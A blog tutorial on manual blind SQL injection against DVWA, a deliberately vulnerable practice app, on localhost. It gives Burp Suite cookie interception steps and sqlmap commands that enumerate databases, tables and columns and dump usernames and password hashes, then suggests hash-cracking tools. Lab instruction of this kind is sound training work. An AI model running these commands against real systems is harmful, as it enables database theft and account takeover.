LEARN CYBER SECURITY

SQL INJECTION (MANUAL) in DVWA - Part 3

by - Cyber Bandit on - 9:46 AM

Part 2- DVWA SQL INJECTION Attack - KALI LINUX.


➢LOGIN TO DVWA(USERNAME: 'admin' PASSWORD: 'password')




● Now set security level to low.
1, Click on DVWA Security, in the left hand menu.
2, Select "low"
3, Click Submit



● Now click on SQL Injection(Blind) and Enter '1' then click submit. Now, we will notice that it will return “User ID exists in Database”Now let's tamper cookie required for injecting.

For this we can use different cookie thief program(i.e Burp suite, Tamper Data)
● We will be using Burp Suite
● Fire up Burpsuite


BURPSUITE CONFIGURATION

● Click on Proxy > Options > Add and match the given settings
 


Now let's configure our browser.

1, Click on ≡ > Preferences
2, Click on Setting in Network Proxy


1, Now match the following settings.



Now we are good to go.
1, Go to Burpsuite and click on Intercept and make sure that intercept is on.
2, Now again go to browser and Enter '1' again.
3, Check Burpsuite. We can see different info(s)
on the screen.



1, Copy the Cookie and PHPSESSID and save it
somewhere else.
2, Now fire up terminal. Now we will use SQLMAP
for injecting.
And type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?
id=1&Submit=Submit" --cookie="security=low; PHPSESSID=(SESSION ID)" –dbs
AND CLICK 'y' for every option



1, Now we can see different name of databases.



2,Let's see what tables are inside dvwa database. For this
type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=(Session id)" -D dvwa –tables



We can see various tables in this Database.
3, Now let's see what columns are inside the table users. For this type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?
id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=(session id)" -D dvwa -T users –column

4, We can see various columns inside the table



5, Now Let's dump entries inside the columns i.e. users and passwords. For this type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=(SESSION ID)" -D dvwa -T users -C user,password –dump

6, Now we can see the username and hash passwords. In your case, if you do not see these hash passwords then you can hash this using crackstation, johntheripper, hashcat



Proof of Concept
Now let's log out and try to log in with username: pablo and password: letmein.. You can login easily




PDF Version >> http://bit.ly/2OAmTLd


Tags
Reactions

Post a Comment

0 Comments